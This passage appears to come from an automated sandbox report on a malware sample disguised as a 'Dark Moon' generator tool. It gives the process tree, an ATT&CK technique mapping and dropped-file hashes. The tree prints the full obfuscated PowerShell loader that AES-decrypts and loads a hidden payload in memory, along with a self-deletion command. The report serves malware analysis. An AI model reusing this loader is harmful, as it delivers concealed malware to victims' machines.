                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                      C:\Windows\SysWOW64\dllhost.exe /Processid:{a7ff55b4-0c01-4d43-98b8-27b7d47413df}
                                                      5⤵
                                                        PID:640
                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{e163a949-37cf-4601-843c-89f9563a844d}
                                                        5⤵
                                                          PID:5464
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 460
                                                            6⤵
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            PID:1408
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                  1⤵
                                                    PID:1272
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1304
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      1⤵
                                                        PID:1352
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        1⤵
                                                          PID:1384
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          1⤵
                                                            PID:1432
                                                            • C:\Windows\system32\sihost.exe
                                                              sihost.exe
                                                              2⤵
                                                                PID:2672
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                              1⤵
                                                                PID:1528
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1544
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                  1⤵
                                                                    PID:1600
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    1⤵
                                                                      PID:1692
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1752
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1784
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1828
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                            1⤵
                                                                              PID:1936
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                              1⤵
                                                                                PID:1964
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                1⤵
                                                                                  PID:1984
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:2036
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                    1⤵
                                                                                    • Checks processor information in registry
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1608
                                                                                  • C:\Windows\System32\spoolsv.exe
                                                                                    C:\Windows\System32\spoolsv.exe
                                                                                    1⤵
                                                                                      PID:2060
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                      1⤵
                                                                                        PID:2224
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                        1⤵
                                                                                          PID:2252
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                          1⤵
                                                                                            PID:2480
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2488
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                              1⤵
                                                                                                PID:2688
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2792
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                1⤵
                                                                                                  PID:2812
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                  1⤵
                                                                                                    PID:2836
                                                                                                  • C:\Windows\sysmon.exe
                                                                                                    C:\Windows\sysmon.exe
                                                                                                    1⤵
                                                                                                      PID:2852
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                      1⤵
                                                                                                        PID:2880
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                        1⤵
                                                                                                          PID:2904
                                                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3104
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                            1⤵
                                                                                                              PID:3484
                                                                                                            • C:\Windows\Explorer.EXE
                                                                                                              C:\Windows\Explorer.EXE
                                                                                                              1⤵
                                                                                                              • Suspicious use of UnmapMainImage
                                                                                                              PID:3556
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\start.bat"
                                                                                                                2⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4500
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\DarkMoon_Gen.exe
                                                                                                                  DarkMoon_Gen.exe
                                                                                                                  3⤵
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1392
                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                    cmd /c "Dark Moon gen.bat"
                                                                                                                    4⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:2216
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      5⤵
                                                                                                                        PID:1592
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        5⤵
                                                                                                                          PID:3176
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 2
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:1700
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:2408
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1440
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:808
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:2568
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:856
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4852
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4056
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping localhost -n 1
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1036
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping discord.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:3204
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:2356
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping www.paysafecard.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:4860
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:3616
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping www.amazon.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:916
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:956
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping play.google.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:2248
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:336
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping store.steampowered.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:2264
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:4056
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping netflix.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1100
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:5408
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping www.spotify.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:5500
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:4216
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping www.xbox.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:5720
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 0
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:5924
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 1
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:6012
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 2
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:3100
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 2
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:4280
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping www.google.com
                                                                                                                          5⤵
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:1036
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout 2
                                                                                                                          5⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:5924
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /K AyBYMBjlvU.bat
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4516
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        4⤵
                                                                                                                          PID:2188
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
                                                                                                                          "AyBYMBjlvU.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                                                                                                                          4⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:836
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{d8fab4c6-b6d0-4284-b77d-03279de32383}
                                                                                                                            5⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5040
                                                                                                                          • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{a3138764-f208-41ce-8b4c-d95966b8a466}
                                                                                                                            5⤵
                                                                                                                              PID:4228
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe" & exit
                                                                                                                              5⤵
                                                                                                                                PID:1108
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  6⤵
                                                                                                                                    PID:4924
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    PING localhost -n 8
                                                                                                                                    6⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:2264
                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                    taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:5912
                                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                                    ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:3804
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                          1⤵
                                                                                                                            PID:3700
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:3880
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4044
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4156
                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:4872
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                    1⤵
                                                                                                                                      PID:4888
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:5000
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:2932
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                          1⤵
                                                                                                                                            PID:4740
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                            1⤵
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:1688
                                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                            1⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:4668
                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                            1⤵
                                                                                                                                              PID:5020
                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:4596
                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:2640
                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:3372
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1636
                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    PID:2108
                                                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5024
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:668
                                                                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:3140
                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                        PID:5380
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2748 -ip 2748
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3248
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5464 -ip 5464
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2032
                                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3116
                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3336
                                                                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5844
                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4292

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                  Persistence

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Defense Evasion

                                                                                                                                                                  Modify Registry

                                                                                                                                                                  1
                                                                                                                                                                  T1112

                                                                                                                                                                  Hide Artifacts

                                                                                                                                                                  1
                                                                                                                                                                  T1564

                                                                                                                                                                  Hidden Files and Directories

                                                                                                                                                                  1
                                                                                                                                                                  T1564.001

                                                                                                                                                                  Discovery

                                                                                                                                                                  Query Registry

                                                                                                                                                                  5
                                                                                                                                                                  T1012

                                                                                                                                                                  System Information Discovery

                                                                                                                                                                  5
                                                                                                                                                                  T1082

                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1018

                                                                                                                                                                  Command and Control

                                                                                                                                                                  Web Service

                                                                                                                                                                  1
                                                                                                                                                                  T1102

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AE.tmp.csv
                                                                                                                                                                    Filesize

                                                                                                                                                                    41KB

                                                                                                                                                                    MD5

                                                                                                                                                                    3dd96d2dc2a86fa6bf9e27a26dd2d67f

                                                                                                                                                                    SHA1

                                                                                                                                                                    aa993d90428cb87758ac5a17f3db40c844c9791d

                                                                                                                                                                    SHA256

                                                                                                                                                                    d578f39c1735c9604ad821c1324cdd6326cb40fe1a116fb5668e540ea924bd09

                                                                                                                                                                    SHA512

                                                                                                                                                                    aaedc0b92e081390425dae46a36aeb0cc0bfcb7e7046e8990891f92524fa2eefac9921c5e0fa8ef299ea51660c7ec747c50e8465154805c76e93679ae0cfd969

                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DE.tmp.txt
                                                                                                                                                                    Filesize

                                                                                                                                                                    13KB

                                                                                                                                                                    MD5

                                                                                                                                                                    92b7536e0a19e9e0dc02fe9f2315ac8c

                                                                                                                                                                    SHA1

                                                                                                                                                                    bce22615b078f564a303d30df4283ffaaea829aa

                                                                                                                                                                    SHA256

                                                                                                                                                                    2eeb7aa7e179823352b28b25c46d163ed50afec6d5fc7f2a4be42c7242c16157

                                                                                                                                                                    SHA512

                                                                                                                                                                    402e2e4961e3d8f129836fba41ea319f882f8407dfa528d0a4c495a176e491a9a563ea6cc3fa226a2057f6167a96b99f30359fb54a7447be09e54c4c0c30d421

                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E3.tmp.csv
                                                                                                                                                                    Filesize

                                                                                                                                                                    41KB

                                                                                                                                                                    MD5

                                                                                                                                                                    f00e4012ae10524e55e89ea3ed3e7c9f

                                                                                                                                                                    SHA1

                                                                                                                                                                    805f03f0a1198765b9c70c4013f84a1e9aa1f366

                                                                                                                                                                    SHA256

                                                                                                                                                                    872269bea744844c11ca45a9109377e2b3200c7c267b969eaeda4e7e038fc12c

                                                                                                                                                                    SHA512

                                                                                                                                                                    49c2f81b441c64e48ad7d3540e8d2d5c2b0eed3c77627a1d087e37608e52609e82ac231641576720ddd838c08775f9eb2bb1cee082a7a2f6288b18bd8f0849ff

                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER722.tmp.txt
                                                                                                                                                                    Filesize

                                                                                                                                                                    13KB

                                                                                                                                                                    MD5

                                                                                                                                                                    38b9c964505b499b228410538d3836e8

                                                                                                                                                                    SHA1

                                                                                                                                                                    7cf2913a2fdd9817f67e72eb5be40ea3608ab5d1

                                                                                                                                                                    SHA256

                                                                                                                                                                    7e2b5fd45a123032a45782aaf78651a34f96b7d08f260d37341eeb0e7c5d948e

                                                                                                                                                                    SHA512

                                                                                                                                                                    0eaff9b48290dcf95facd72e1901c5caa02ca1a82e4f5b5ad170f8ad22c28afde97bf85afe806a29368539f07eb865e1706f867e26f9c807514eb1cb98b22432

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
                                                                                                                                                                    Filesize

                                                                                                                                                                    35KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c153581143e0b72cecae38a393991a4b

                                                                                                                                                                    SHA1

                                                                                                                                                                    da43d03b19765594ff124415a060551343823a39

                                                                                                                                                                    SHA256

                                                                                                                                                                    2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005

                                                                                                                                                                    SHA512

                                                                                                                                                                    8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_glllkkar.ytl.ps1
